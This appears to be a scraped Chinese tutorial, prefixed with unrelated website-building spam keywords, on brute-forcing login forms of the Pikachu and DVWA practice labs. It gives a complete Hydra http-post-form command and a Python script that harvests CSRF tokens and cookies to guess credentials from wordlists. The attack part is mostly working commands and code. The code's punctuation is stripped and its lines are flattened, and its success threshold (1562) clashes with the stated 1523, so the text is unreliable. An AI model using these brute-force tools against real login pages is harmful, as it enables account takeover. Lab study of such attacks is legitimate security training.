常州公司网站模板建站,福建设备公司网站,济南手机网站设计,百度知道问答首页文章目录 无token时的Hydra post登录框爆破带Token时的Hydra post登录框爆破 无token时的Hydra post登录框爆破
登录一个无验证码和token的页面#xff0c;同时抓包拦截
取出发送数据包#xff1a;usernameadbpassword133submitLogin 将用户名和密码替换 userna… 文章目录 无token时的Hydra post登录框爆破带Token时的Hydra post登录框爆破 无token时的Hydra post登录框爆破
登录一个无验证码和token的页面同时抓包拦截
取出发送数据包usernameadbpassword133submitLogin 将用户名和密码替换 usernameUSERpasswordPASSsubmitLogin 同时获取路径/pikachu/vul/burteforce/bf_form.php 拼接发送数据后就是 /pikachu/vul/burteforce/bf_form.php:usernameUSERpasswordPASSsubmitLogin 获取目标Ip192.168.180.2 获取登录失败时的错误提示username or password is not exists
启动hydra开始爆破 hydra -L /home/kali/dic/acount.txt -P /home/kali/dic/mima.txt -V -f 192.168.180.2 http-post-form “/pikachu/vul/burteforce/bf_form.php:usernameUSERpasswordPASSsubmitLogin:username or password is not exists” -f表示找到一个马上停止
带Token时的Hydra post登录框爆破
首先准备一个带token的登录页面
抓包可以看到存在token
提取其中的POST路径/dvwa/login.php 提取ip:192.168.180.2
然后准备一个python脚本将路径和ip替换到相应位置,如下所示
# -*- coding: utf-8 -*-
import urllib
import requests
from bs4 import BeautifulSoup
##第一步先访问 http://127.0.0.1/login.php页面获得服务器返回的cookie和token
def get_cookie_token(ip, url):headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Upgrade-Insecure-Requests:1}resrequests.get(url,headersheaders)cookiesres.cookiesa[(;.join([.join(item)for item in cookies.items()]))] ## a为列表存储cookie和tokenhtmlres.textsoupBeautifulSoup(html,html.parser)tokensoup.form.contents[3][value]a.append(token)return a##第二步模拟登陆
#ip 192.168.180.2
#url http://192.168.180.2/dvwa/login.php
def Login(a,username,password, ip, url): #a是包含了cookie和token的列表headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Content-Length:88,Content-Type:application/x-www-form-urlencoded,Upgrade-Insecure-Requests:1,Cookie:a[0],Referer:url}values{username:username,password:password,Login:Login,user_token:a[1]}dataurllib.parse.urlencode(values)resprequests.post(url,datadata,headersheaders)return
#重定向到index.php
def getacount(ip, url):with open(acount.txt,r) as f:usersf.readlines()stop Falsefor user in users:if stop True:breakuseruser.strip(\n) #用户名with open(mima.txt,r) as file:passwdsfile.readlines()for passwd in passwds:passwdpasswd.strip(\n) #密码aget_cookie_token(ip, url) ##a列表中存储了服务器返回的cookie和tokeLogin(a,user,passwd, ip, url)headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Upgrade-Insecure-Requests:1,Cookie:a[0],Referer:url}responserequests.get(url,headersheaders)#print(len(response.text))content_size len(response.text)if content_size ! 1562: #如果登录成功print(用户名为%s ,密码为%s%(user,passwd)) #打印出用户名和密码stop Truebreak
def main():ip 192.168.180.2url http://192.168.180.2/dvwa/login.phpgetacount(ip, url)
if __name____main__:main()然后开启print(len(response.text))获取错误登录时的长度
可以看到错误时都是1523将该值替换到 if content_size ! 1523: #如果登录成功 同时注释print(len(response.text)) 可以看到顺利爆破出了用户名密码
